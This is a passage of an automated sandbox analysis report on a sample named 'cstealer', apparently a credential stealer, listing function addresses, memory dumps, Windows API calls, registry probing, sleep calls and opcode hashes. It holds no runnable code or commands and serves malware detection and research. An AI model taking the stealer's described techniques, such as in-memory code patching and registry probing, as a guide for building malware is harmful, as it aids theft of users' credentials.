                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                            • Opcode ID: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                                                                                                                            • Instruction ID: 8376dbd94e06a60e52e5221bf3d7b344e45b39ef527dec3484ffc0156379225a
                                                                                                                                                            • Opcode Fuzzy Hash: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                                                                                                                            • Instruction Fuzzy Hash: 4C116061B1974341FA719721E8153FA52E4EF48BC5F8004B2E84ECA6A9EE1CEF498710
                                                                                                                                                            Function 00007FF6957F5EF0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                            • Opcode ID: 426be33b010e02d3cd41f92f04ebae3f0422e1fced414359e9086f992fe8f504
                                                                                                                                                            • Instruction ID: e6663f71ca957a6ee549669d9392d68df70acd5007b7682ec2b1c3eb6e4886c0
                                                                                                                                                            • Opcode Fuzzy Hash: 426be33b010e02d3cd41f92f04ebae3f0422e1fced414359e9086f992fe8f504
                                                                                                                                                            • Instruction Fuzzy Hash: 1141B262D1878293E764CB20D5403B967E0FF94B64F109375EA9C8BAD1DF7CAAE09700
                                                                                                                                                            Function 00007FF6957E2310 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                            • Opcode ID: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                                                                                                                            • Instruction ID: 71d4d5400b0ec71d6a2b5328aae7264f3d545339b01560599d068771d2ab6e24
                                                                                                                                                            • Opcode Fuzzy Hash: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                                                                                                                            • Instruction Fuzzy Hash: FD11CC21E1865242F7649B69F5482FD52D1EF85FC0F448071DA498BBE9CD7CDDC94700
                                                                                                                                                            Function 00007FF6957EC3CC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                            • Opcode ID: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                                                                                                                            • Instruction ID: dfd300ae97f88bd05353b2d25524d34931358b545ccca6bda5ddab92ecd8e3dc
                                                                                                                                                            • Opcode Fuzzy Hash: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                                                                                                                            • Instruction Fuzzy Hash: 6B313929E0931341FA74AB65A5563F926D5EF42F84F5410B5EA0ECF2E3DE2CAE098340
                                                                                                                                                            Function 00000271DC6739E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Virtual$AllocQuery
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 31662377-0
                                                                                                                                                            • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                                            • Instruction ID: a875eccf4cbca2122ac52142e2ba099ab4ec564258f79b6d4129b99f8a2d9bee
                                                                                                                                                            • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                                            • Instruction Fuzzy Hash: ED31D13221EA8489EE719E9DE05935A66A4FB88B84F200D35A5CD46FD8EF7DC5608F04
                                                                                                                                                            Function 00000271DC67328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1683269324-0
                                                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                            • Instruction ID: e33c0a8993a9d0a092934029623b3c3f4d343e03eddcd33c65ea6f6b7e8c180d
                                                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                            • Instruction Fuzzy Hash: 1F112A7161F6808AFF709FE9A90D3992294AF54B55F604D359B4E81FE1FF78C0688E40
                                                                                                                                                            Function 00000271DC674DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3733156554-0
                                                                                                                                                            • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                                                            • Instruction ID: 6fa53c38ba1ab4b18213726b367b1918ac0280b598fe87874ece9360d7f0c7cd
                                                                                                                                                            • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                                                            • Instruction Fuzzy Hash: 55F01D3621DA04C4DA319F49E44835AABA0EB887E4F144911BA8D03FA9DE38C6A18F00
                                                                                                                                                            Function 00007FF6957FA7E4 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                            • Opcode ID: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                                                                                                                            • Instruction ID: 38d088cf905d6aa0255940bb24d75c3f276c4fdf9ed3a1cfc31d7d7ddc91c339
                                                                                                                                                            • Opcode Fuzzy Hash: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                                                                                                                            • Instruction Fuzzy Hash: 7DD06C10F1971246EA29AF7069991B96291DF48F51F1054B9CC0A8A393CEACAD4AD341
                                                                                                                                                            Function 00000271DC64273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3550616410-0
                                                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                            • Instruction ID: 1cf17eec2f5a536843fb37b1809d21efc8b0b267d875d33db62adc1f0fe90885
                                                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                            • Instruction Fuzzy Hash: 5961E472B0E6908FDB658FDA904472DB393FB54B94F688525DE5D07788DA34D862CB00
                                                                                                                                                            Function 00007FF6957F0A6C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 0eaa1c8d06bd359b1122625d16b3aa7d08c7f0865ba5f1d40f60a3f142269269
                                                                                                                                                            • Instruction ID: b9b11bc2ed055692fd039d1a5aed13fa311370c38c443bf2e1dcde029cddf784
                                                                                                                                                            • Opcode Fuzzy Hash: 0eaa1c8d06bd359b1122625d16b3aa7d08c7f0865ba5f1d40f60a3f142269269
                                                                                                                                                            • Instruction Fuzzy Hash: 0351E961B0A64286FA38DE3598006BA66D1FF44FA8F144774DE6E8B7C5CE3CDE00E610
                                                                                                                                                            Function 00000271DC671ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00000271DC671628: GetProcessHeap.KERNEL32 ref: 00000271DC671633
                                                                                                                                                              • Part of subcall function 00000271DC671628: HeapAlloc.KERNEL32 ref: 00000271DC671642
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC6716B2
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC6716DF
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC6716F9
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC671719
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC671734
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC671754
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC67176F
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC67178F
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC6717AA
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC6717CA
                                                                                                                                                            • Sleep.KERNEL32 ref: 00000271DC671AD7
                                                                                                                                                            • SleepEx.KERNEL32 ref: 00000271DC671ADD
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC6717E5
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC671805
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC671820
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC671840
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC67185B
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC67187B
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC671896
                                                                                                                                                              • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC6718A0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1534210851-0
                                                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                            • Instruction ID: 5131f9bc433de86c6ea1ba7ef434490237d26b4c83db61d65b44d5ea3a85ccc3
                                                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                            • Instruction Fuzzy Hash: 8E31C0B121A64189FF749FAED6593A913A4AF94FD0F045C239E0D87BE5FE14C471CA10
                                                                                                                                                            Function 00007FF6957FB910 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6957FB78D,?,?,00000000,00007FF6957FB842), ref: 00007FF6957FB97E
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6957FB78D,?,?,00000000,00007FF6957FB842), ref: 00007FF6957FB988
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1687624791-0
                                                                                                                                                            • Opcode ID: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                                                                                                                            • Instruction ID: dd7cdc8f7dfd7cb12f479402c57a3361d6e0381f78298511d3dc585838adfb93
                                                                                                                                                            • Opcode Fuzzy Hash: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                                                                                                                            • Instruction Fuzzy Hash: D5219251B1864282EEB0D72195982792BC1DF44FA4F1843B5DE6ECF3C2CE6CAD49A300
                                                                                                                                                            Function 00007FF6957FCEE4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                            • Opcode ID: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                                                                                                                            • Instruction ID: ec989aace0a02eb94ae8f76a4f81fdc149e0e398b8bffe379cca5448aed10d4e
                                                                                                                                                            • Opcode Fuzzy Hash: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                                                                                                                            • Instruction Fuzzy Hash: B211BFA261CA9281DA20CB25E404069B7E5EB44FF4F684372EE7D8B7E9CF3CD9548700
                                                                                                                                                            Function 00007FF6957FCC5C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                                                                                                                            • Instruction ID: 69e1d1dddac3480fe611691e6558b2aaf3537894ce73bd16f85d37a9be52a1f7
                                                                                                                                                            • Opcode Fuzzy Hash: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                                                                                                                            • Instruction Fuzzy Hash: 9841E03291D20183EA34CB29A54127D7BE4EB56F85F1402B1DE8ECB6D1CF2CEA02E751
                                                                                                                                                            Function 00007FF6957E84C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                            • Opcode ID: 1ebb882e0e36686c091ac8b6909201a7281ca5a27fb43f3ddbff45ec7b354aac
                                                                                                                                                            • Instruction ID: 1c1238c2f478f2e0652e8c7906ef5078dc14d926237f350445237113c1dfe5e2
                                                                                                                                                            • Opcode Fuzzy Hash: 1ebb882e0e36686c091ac8b6909201a7281ca5a27fb43f3ddbff45ec7b354aac
                                                                                                                                                            • Instruction Fuzzy Hash: 00217E21B0979285EB609A13B9147FAA691FF45FD4F884470EE0D8B796DE3CEA46C600
                                                                                                                                                            Function 00007FF6957FC6EC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
                                                                                                                                                            • Instruction ID: b48ed51a3ccf43a88b9eb4f2078197abd380849e8bf167566c5d1577905b4edd
                                                                                                                                                            • Opcode Fuzzy Hash: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
                                                                                                                                                            • Instruction Fuzzy Hash: 76319E22A1DA5289EA21DB15C8413783AD4EB40F95F4106B5DE1D8F3D2CF7CAE42E761
                                                                                                                                                            Function 00007FF6957FA715 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3947729631-0
